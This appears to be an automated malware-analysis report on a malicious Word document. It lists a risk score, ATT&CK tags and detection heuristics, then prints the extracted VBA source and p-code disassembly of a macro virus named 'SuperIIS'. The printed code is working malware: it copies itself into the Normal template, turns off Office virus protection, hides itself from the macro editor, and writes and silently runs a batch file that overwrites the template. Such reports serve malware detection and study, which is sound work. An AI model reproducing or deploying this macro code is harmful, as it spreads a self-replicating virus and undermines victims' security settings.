MALICIOUS
296
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers the StealthDoc subroutine, which attempts to remove specific VBA components from both the Normal template and the active document. This self-cleaning behavior suggests an attempt to evade detection. The presence of AutoOpen and Auto_Close macros, along with Shell() calls, indicates a malicious intent to execute code, likely to download and run a secondary payload.
Heuristics 8
-
ClamAV: Doc.Trojan.IIS-19 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.IIS-19
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
a = Shell(windir & "\system\lo.bat", 0) -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
NormalTemplate.VBProject.VBComponents(1).CodeModule.deleteLines 1, x -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
If ii = 186 Then FullCode = FullCode & "Sub AutoClose" & Chr(13) -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44885 bytes |
SHA-256: 1b1b97c99f56fd02019e4ca8538aadf9e35a16d93af268ad4fa0c508d8cd58f6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul1" Sub AutoOpen() On Error GoTo eb 'MyName=SuperIIS Call MakeView eb: End Sub Sub StealthDoc() On Error GoTo eb 'Clean NormalTemplate: ms = NormalTemplate.VBProject.VBComponents.Count For i = 1 To ms a = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.countofLines If a > 1 Then f = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.lines(1, 1) If UCase(f) = "SUB VIEWVBCODE()" Then Exit For Next i If UCase(f) = "SUB VIEWVBCODE()" Then a = NormalTemplate.VBProject.VBComponents(i).Name Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If For n = 1 To ms a = NormalTemplate.VBProject.VBComponents.Item(n).CodeModule.countofLines If a > 1 Then f = NormalTemplate.VBProject.VBComponents.Item(n).CodeModule.lines(3, 1) If UCase(f) = "'MYNAME=SUPERIIS" Then Exit For Next n If UCase(f) = "'MYNAME=SUPERIIS" Then a = NormalTemplate.VBProject.VBComponents(n).Name Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If f = "" 'Clean Document: f = "" ms = ActiveDocument.VBProject.VBComponents.Count For ii = 1 To ms a = ActiveDocument.VBProject.VBComponents.Item(ii).CodeModule.countofLines If a > 1 Then f = ActiveDocument.VBProject.VBComponents.Item(ii).CodeModule.lines(1, 1) If UCase(f) = "SUB VIEWVBCODE()" Then Exit For Next ii If UCase(f) = "SUB VIEWVBCODE()" Then a = ActiveDocument.VBProject.VBComponents(ii).Name Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If For fg = 1 To ms f = "" a = ActiveDocument.VBProject.VBComponents.Item(fg).CodeModule.countofLines If a > 1 Then f = ActiveDocument.VBProject.VBComponents.Item(fg).CodeModule.lines(3, 1) If UCase(f) = "'MYNAME=SUPERIIS" Then Exit For Next fg If UCase(f) = "'MYNAME=SUPERIIS" Then a = ActiveDocument.VBProject.VBComponents(fg).Name Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If esub: Close Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop x = NormalTemplate.VBProject.VBComponents(1).CodeModule.countofLines Close Open "c:\lo.sys" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close NormalTemplate.VBProject.VBComponents.Import "c:\lo.sys" NormalTemplate.VBProject.VBComponents(1).CodeModule.deleteLines 1, x NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, "Private Sub ToolsMacro()" NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 2, "Application.dialogs (wddialogtoolsmacro).show" NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 3, "End Sub" ShowVisualBasicEditor = True If windir = "" Then Exit Sub a = Shell(windir & "\system\lo.bat", 0) eb: End Sub Sub MacroSDoc() On Error GoTo eb 'Clean NormalTemplate: ms = NormalTemplate.VBProject.VBComponents.Count For i = 1 To ms a = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.countofLines If a > 1 Then f = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.lines(1, 1) If UCase(f) = "SUB VIEWVBCODE()" Then Exit For Next i If UCase(f) = "SUB VIEWVBCODE()" Then a = NormalTemplate.VBProject.VBComponents(i).Name Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If For n = 1 To ms a = NormalTemplate.VBProject.VBComponents.Item(n).CodeModule.countofLines If a > 1 Then f = NormalTemplate.VBProject.VBComponents.Item(n).CodeModule.lines(3, 1) If UCase(f) = "'MYNAME=SUPERIIS" Then Exit For Next n If UCase(f) = "'MYNAME=SUPERIIS" Then a = NormalTemplate.VBProject.VBComponents(n).Name Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If f = "" 'Clean Document: f = "" ms = ActiveDocument.VBProject.VBComponents.Count For ii = 1 To ms a = ActiveDocument.VBProject.VBComponents.Item(ii).CodeModule.countofLines If a > 1 Then f = ActiveDocument.VBProject.VBComponents.Item(ii).CodeModule.lines(1, 1) If UCase(f) = "SUB VIEWVBCODE()" Then Exit For Next ii If UCase(f) = "SUB VIEWVBCODE()" Then a = ActiveDocument.VBProject.VBComponents(ii).Name Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If For fg = 1 To ms f = "" a = ActiveDocument.VBProject.VBComponents.Item(fg).CodeModule.countofLines If a > 1 Then f = ActiveDocument.VBProject.VBComponents.Item(fg).CodeModule.lines(3, 1) If UCase(f) = "'MYNAME=SUPERIIS" Then Exit For Next fg If UCase(f) = "'MYNAME=SUPERIIS" Then a = ActiveDocument.VBProject.VBComponents(fg).Name Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If esub: Close Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop If windir = "" Then Exit Sub a = Shell(windir & "\system\lo.bat", 0) x = NormalTemplate.VBProject.VBComponents(1).CodeModule.countofLines Close Open "c:\lo.sys" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close NormalTemplate.VBProject.VBComponents.Import "c:\lo.sys" NormalTemplate.VBProject.VBComponents(1).CodeModule.deleteLines 1, x NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, "Private Sub ToolsMacro()" NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 2, "Application.dialogs (wddialogtoolsmacro).show" NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 3, "End Sub" eb: End Sub Private Sub MakeView() On Error GoTo eb StealthCode = "Sub ViewVbCode()" & Chr(13) StealthCode = StealthCode & "Call Stealth" & Chr(13) StealthCode = StealthCode & "end sub" & Chr(13) StealthCode = StealthCode & "sub ToolsMacro" & Chr(13) StealthCode = StealthCode & "Call MacroS" & Chr(13) StealthCode = StealthCode & "End Sub" & Chr(13) ms = NormalTemplate.VBProject.VBComponents.Count For i = 1 To ms a = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.countofLines If a > 1 Then f = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.lines(1, 1) If UCase(f) = "SUB VIEWVBCODE()" Then Exit For Next i If UCase(f) = "SUB VIEWVBCODE()" Then NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.deleteLines 1, a NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.AddFromString (StealthCode) Else Close Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop If windir = "" Then Exit Sub Close gg = Dir(windir & "\system\losys.exe") If gg <> "" Then Kill windir & "\system\losys.exe" Open windir & "\System\losys.exe" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Print #1, StealthCode Close NormalTemplate.VBProject.VBComponents.Import windir & "\System\losys.exe" End If Call FileClose eb: End Sub Sub FileClose() On Error GoTo eb Options.VirusProtection = False Options.ConfirmConversions = False Options.SaveNormalPrompt = False Close Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop If windir = "" Then Exit Sub On Error GoTo NoInf a = ActiveDocument.VBProject.VBComponents.Count For i = 1 To a ls = ActiveDocument.VBProject.VBComponents(i).CodeModule.countofLines If ls > 1 Then l = ActiveDocument.VBProject.VBComponents(i).CodeModule.lines(3, 1) If UCase(l) = "'MYNAME=SUPERIIS" Then acd = 1 Exit For End If Next i If acd = 1 Then FullCode = "Sub AutoExec" & Chr(13) a = ActiveDocument.VBProject.VBComponents.Item(i).CodeModule.countofLines For ii = 2 To a If ii = 7 Then GoTo no2 If ii = 77 Then GoTo no2 If ii = 186 Then GoTo no2 If ii = 183 Then GoTo no2 l = ActiveDocument.VBProject.VBComponents.Item(i).CodeModule.lines(ii, 1) FullCode = FullCode & l & Chr(13) no2: If ii = 7 Then FullCode = FullCode & "Sub Stealth" & Chr(13) If ii = 77 Then FullCode = FullCode & "Sub MacroS" & Chr(13) If ii = 186 Then FullCode = FullCode & "Sub AutoClose" & Chr(13) If ii = 183 Then FullCode = FullCode & "Call AutoClose" & Chr(13) Next ii End If a = NormalTemplate.VBProject.VBComponents.Count For iii = 1 To a ls = NormalTemplate.VBProject.VBComponents(iii).CodeModule.countofLines If ls > 1 Then l = NormalTemplate.VBProject.VBComponents(iii).CodeModule.lines(3, 1) If UCase(l) = "'MYNAME=SUPERIIS" Then NormT = 1 Exit For End If Next iii If NormT = 1 Then FullCode = "Sub AutoOpen" & Chr(13) a = NormalTemplate.VBProject.VBComponents.Item(iii).CodeModule.countofLines For iiii = 2 To a If iiii = 7 Then GoTo non2 If iiii = 77 Then GoTo non2 If iiii = 186 Then GoTo non2 If iiii = 183 Then GoTo non2 l = NormalTemplate.VBProject.VBComponents.Item(iii).CodeModule.lines(iiii, 1) FullCode = FullCode & l & Chr(13) non2: If iiii = 7 Then FullCode = FullCode & "Sub StealthDoc" & Chr(13) If iiii = 77 Then FullCode = FullCode & "Sub MacroSDoc" & Chr(13) If iiii = 186 Then FullCode = FullCode & "Sub FileClose" & Chr(13) If iiii = 183 Then FullCode = FullCode & "Call FileClose" & Chr(13) Next iiii End If If NormT <> 1 Then a = Dir(windir & "\System\lo.sys") If a <> "" Then Kill windir & "\System\lo.sys" Application.NormalTemplate.OpenAsDocument Close d = Dir(windir & "\System\vmm64.vxd") If d <> "" Then Kill windir & "\System\vmm64.vxd" Open windir & "\System\Vmm64.vxd" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Print #1, FullCode Close ActiveDocument.VBProject.VBComponents.Import windir & "\System\Vmm64.VXD" ActiveDocument.SaveAs FileName:=windir & "\System\lo.sys", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False ActiveDocument.Save ActiveDocument.Close a = Dir(windir & "\System\lo.bat") If a <> "" Then Kill windir & "\System\lo.bat" Close Open windir & "\System\lo.bat" For Append As #1 Print #1, ":Begin" l = Len(NormalTemplate.FullName) l = l - 10 Print #1, "If not exist " & Left(NormalTemplate.FullName, l) & "~$Normal.dot goto start" Print #1, "Goto Begin" Print #1, ":Start" Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Close a = Shell(windir & "\System\lo.bat", 0) End If If acd <> 1 Then Close d = Dir(windir & "\System\vmm64.vxd") If d <> "" Then Kill windir & "\System\vmm64.vxd" Open windir & "\System\Vmm64.vxd" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Print #1, FullCode Close ActiveDocument.VBProject.VBComponents.Import windir & "\System\Vmm64.VXD" If UCase(Left(ActiveDocument.FullName, 1)) <> "A" And Mid(ActiveDocument.FullName, 3, 1) = "\" Then ActiveDocument.Save End If NoInf: eb: End Sub ' Processing file: /tmp/qstore_7vfte_cs ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 903 bytes ' Macros/VBA/Modul1 - 17143 bytes ' Line #0: ' FuncDefn (Sub AutoOpen()) ' Line #1: ' OnError eb ' Line #2: ' QuoteRem 0x0000 0x000F "MyName=SuperIIS" ' Line #3: ' ArgsCall (Call) MakeView 0x0000 ' Line #4: ' Label eb ' Line #5: ' EndSub ' Line #6: ' FuncDefn (Sub StealthDoc()) ' Line #7: ' OnError eb ' Line #8: ' QuoteRem 0x0000 0x0015 "Clean NormalTemplate:" ' Line #9: ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' St ms ' Line #10: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' Ld ms ' For ' Line #11: ' Ld i ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd countofLines ' St a ' Line #12: ' Ld a ' LitDI2 0x0001 ' Gt ' If ' BoSImplicit ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld i ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd lines 0x0002 ' St False ' EndIf ' Line #13: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "SUB VIEWVBCODE()" ' Eq ' If ' BoSImplicit ' ExitFor ' EndIf ' Line #14: ' StartForVariable ' Ld i ' EndForVariable ' NextVar ' Line #15: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "SUB VIEWVBCODE()" ' Eq ' IfBlock ' Line #16: ' Ld i ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' St a ' Line #17: ' Ld NormalTemplate ' MemLd FullName ' ParamNamed Source ' Ld a ' ParamNamed New ' Ld wdOrganizerObjectProjectItems ' ParamNamed On ' Ld Application ' ArgsMemCall OrganizerDelete 0x0003 ' Line #18: ' EndIfBlock ' Line #19: ' StartForVariable ' Ld n ' EndForVariable ' LitDI2 0x0001 ' Ld ms ' For ' Line #20: ' Ld n ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd countofLines ' St a ' Line #21: ' Ld a ' LitDI2 0x0001 ' Gt ' If ' BoSImplicit ' LitDI2 0x0003 ' LitDI2 0x0001 ' Ld n ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd lines 0x0002 ' St False ' EndIf ' Line #22: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "'MYNAME=SUPERIIS" ' Eq ' If ' BoSImplicit ' ExitFor ' EndIf ' Line #23: ' StartForVariable ' Ld n ' EndForVariable ' NextVar ' Line #24: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "'MYNAME=SUPERIIS" ' Eq ' IfBlock ' Line #25: ' Ld n ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' St a ' Line #26: ' Ld NormalTemplate ' MemLd FullName ' ParamNamed Source ' Ld a ' ParamNamed New ' Ld wdOrganizerObjectProjectItems ' ParamNamed On ' Ld Application ' ArgsMemCall OrganizerDelete 0x0003 ' Line #27: ' EndIfBlock ' Line #28: ' LitStr 0x0000 "" ' St False ' Line #29: ' QuoteRem 0x0000 0x000F "Clean Document:" ' Line #30: ' LitStr 0x0000 "" ' St False ' Line #31: ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' St ms ' Line #32: ' StartForVariable ' Ld ii ' EndForVariable ' LitDI2 0x0001 ' Ld ms ' For ' Line #33: ' Ld ii ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd countofLines ' St a ' Line #34: ' Ld a ' LitDI2 0x0001 ' Gt ' If ' BoSImplicit ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ii ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd lines 0x0002 ' St False ' EndIf ' Line #35: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "SUB VIEWVBCODE()" ' Eq ' If ' BoSImplicit ' ExitFor ' EndIf ' Line #36: ' StartForVariable ' Ld ii ' EndForVariable ' NextVar ' Line #37: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "SUB VIEWVBCODE()" ' Eq ' IfBlock ' Line #38: ' Ld ii ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' St a ' Line #39: ' Ld ActiveDocument ' MemLd FullName ' ParamNamed Source ' Ld a ' ParamNamed New ' Ld wdOrganizerObjectProjectItems ' ParamNamed On ' Ld Application ' ArgsMemCall OrganizerDelete 0x0003 ' Line #40: ' EndIfBlock ' Line #41: ' StartForVariable ' Ld fg ' EndForVariable ' LitDI2 0x0001 ' Ld ms ' For ' Line #42: ' LitStr 0x0000 "" ' St False ' Line #43: ' Ld fg ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd countofLines ' St a ' Line #44: ' Ld a ' LitDI2 0x0001 ' Gt ' If ' BoSImplicit ' LitDI2 0x0003 ' LitDI2 0x0001 ' Ld fg ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd lines 0x0002 ' St False ' EndIf ' Line #45: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "'MYNAME=SUPERIIS" ' Eq ' If ' BoSImplicit ' ExitFor ' EndIf ' Line #46: ' StartForVariable ' Ld fg ' EndForVariable ' NextVar ' Line #47: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "'MYNAME=SUPERIIS" ' Eq ' IfBlock ' Line #48: ' Ld fg ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' St a ' Line #49: ' Ld ActiveDocument ' MemLd FullName ' ParamNamed Source ' Ld a ' ParamNamed New ' Ld wdOrganizerObjectProjectItems ' ParamNamed On ' Ld Application ' ArgsMemCall OrganizerDelete 0x0003 ' Line #50: ' EndIfBlock ' Line #51: ' Label esub ' Line #52: ' CloseAll ' Line #53: ' LitStr 0x000C "c:\msdos.sys" ' LitDI2 0x0001 ' Sharp ' LitDefault ' Open (For Input) ' Line #54: ' LitDI2 0x0001 ' ArgsLd EOF 0x0001 ' DoUnitil ' Line #55: ' LitDI2 0x0001 ' Ld a ' LineInput ' Line #56: ' Ld a ' ArgsLd UCase 0x0001 ' LitDI2 0x0007 ' ArgsLd LBound 0x0002 ' LitStr 0x0007 "WINDIR=" ' Eq ' IfBlock ' Line #57: ' Ld a ' FnLen ' St l ' Line #58: ' Ld a ' LitDI2 0x0008 ' Ld l ' ArgsLd Mid$ 0x0003 ' St windir ' Line #59: ' EndIfBlock ' Line #60: ' Loop ' Line #61: ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' MemLd countofLines ' St x ' Line #62: ' CloseAll ' Line #63: ' LitStr 0x0009 "c:\lo.sys" ' LitDI2 0x0001 ' Sharp ' LitDefault ' Open (For Append) ' Line #64: ' LitDI2 0x0001 ' Sharp ' PrintChan ' LitStr 0x0014 "Attribute VB_Name = " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0006 "Modul1" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' PrintItemNL ' Line #65: ' CloseAll ' Line #66: ' LitStr 0x0009 "c:\lo.sys" ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemCall Import 0x0001 ' Line #67: ' LitDI2 0x0001 ' Ld x ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemCall deleteLines 0x0002 ' Line #68: ' LitDI2 0x0001 ' LitStr 0x0018 "Private Sub ToolsMacro()" ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemCall InsertLines 0x0002 ' Line #69: ' LitDI2 0x0002 ' LitStr 0x002D "Application.dialogs (wddialogtoolsmacro).show" ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemCall InsertLines 0x0002 ' Line #70: ' LitDI2 0x0003 ' LitStr 0x0007 "End Sub" ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemCall InsertLines 0x0002 ' Line #71: ' LitVarSpecial (True) ' St ShowVisualBasicEditor ' Line #72: ' Ld windir ' LitStr 0x0000 "" ' Eq ' If ' BoSImplicit ' ExitSub ' EndIf ' Line #73: ' Ld windir ' LitStr 0x000E "\system\lo.bat" ' Concat ' LitDI2 0x0000 ' ArgsLd Shell 0x0002 ' St a ' Line #74: ' Label eb ' Line #75: ' EndSub ' Line #76: ' FuncDefn (Sub MacroSDoc()) ' Line #77: ' OnError eb ' Line #78: ' QuoteRem 0x0000 0x0015 "Clean NormalTemplate:" ' Line #79: ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' St ms ' Line #80: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' Ld ms ' For ' Line #81: ' Ld i ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd countofLines ' St a ' Line #82: ' Ld a ' LitDI2 0x0001 ' Gt ' If ' BoSImplicit ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld i ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd lines 0x0002 ' St False ' EndIf ' Line #83: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "SUB VIEWVBCODE()" ' Eq ' If ' BoSImplicit ' ExitFor ' EndIf ' Line #84: ' StartForVariable ' Ld i ' EndForVariable ' NextVar ' Line #85: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "SUB VIEWVBCODE()" ' Eq ' IfBlock ' Line #86: ' Ld i ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' St a ' Line #87: ' Ld NormalTemplate ' MemLd FullName ' ParamNamed Source ' Ld a ' ParamNamed New ' Ld wdOrganizerObjectProjectItems ' ParamNamed On ' Ld Application ' ArgsMemCall OrganizerDelete 0x0003 ' Line #88: ' EndIfBlock ' Line #89: ' StartForVariable ' Ld n ' EndForVariable ' LitDI2 0x0001 ' Ld ms ' For ' Line #90: ' Ld n ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd countofLines ' St a ' Line #91: ' Ld a ' LitDI2 0x0001 ' Gt ' If ' BoSImplicit ' LitDI2 0x0003 ' LitDI2 0x0001 ' Ld n ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd lines 0x0002 ' St False ' EndIf ' Line #92: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "'MYNAME=SUPERIIS" ' Eq ' If ' BoSImplicit ' ExitFor ' EndIf ' Line #93: ' StartForVariable ' Ld n ' EndForVariable ' NextVar ' Line #94: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "'MYNAME=SUPERIIS" ' Eq ' IfBlock ' Line #95: ' Ld n ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' St a ' Line #96: ' Ld NormalTemplate ' MemLd FullName ' ParamNamed Source ' Ld a ' ParamNamed New ' Ld wdOrganizerObjectProjectItems ' ParamNamed On ' Ld Application ' ArgsMemCall OrganizerDelete 0x0003 ' Line #97: ' EndIfBlock ' Line #98: ' LitStr 0x0000 "" ' St False ' Line #99: ' QuoteRem 0x0000 0x000F "Clean Document:" ' Line #100: ' LitStr 0x0000 "" ' St False ' Line #101: ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' St ms ' Line #102: ' StartForVariable ' Ld ii ' EndForVariable ' LitDI2 0x0001 ' Ld ms ' For ' Line #103: ' Ld ii ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd countofLines ' St a ' Line #104: ' Ld a ' LitDI2 0x0001 ' Gt ' If ' BoSImplicit ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ii ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd lines 0x0002 ' St False ' EndIf ' Line #105: ' Ld False ' ArgsLd UCase 0x0001 ' LitStr 0x0010 "SUB VIEWVBCODE()" ' Eq ' If ' BoSImplicit ' ExitFor ' EndIf ' Line #106: ' StartForVariable ' Ld ii ' EndForVariable … |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.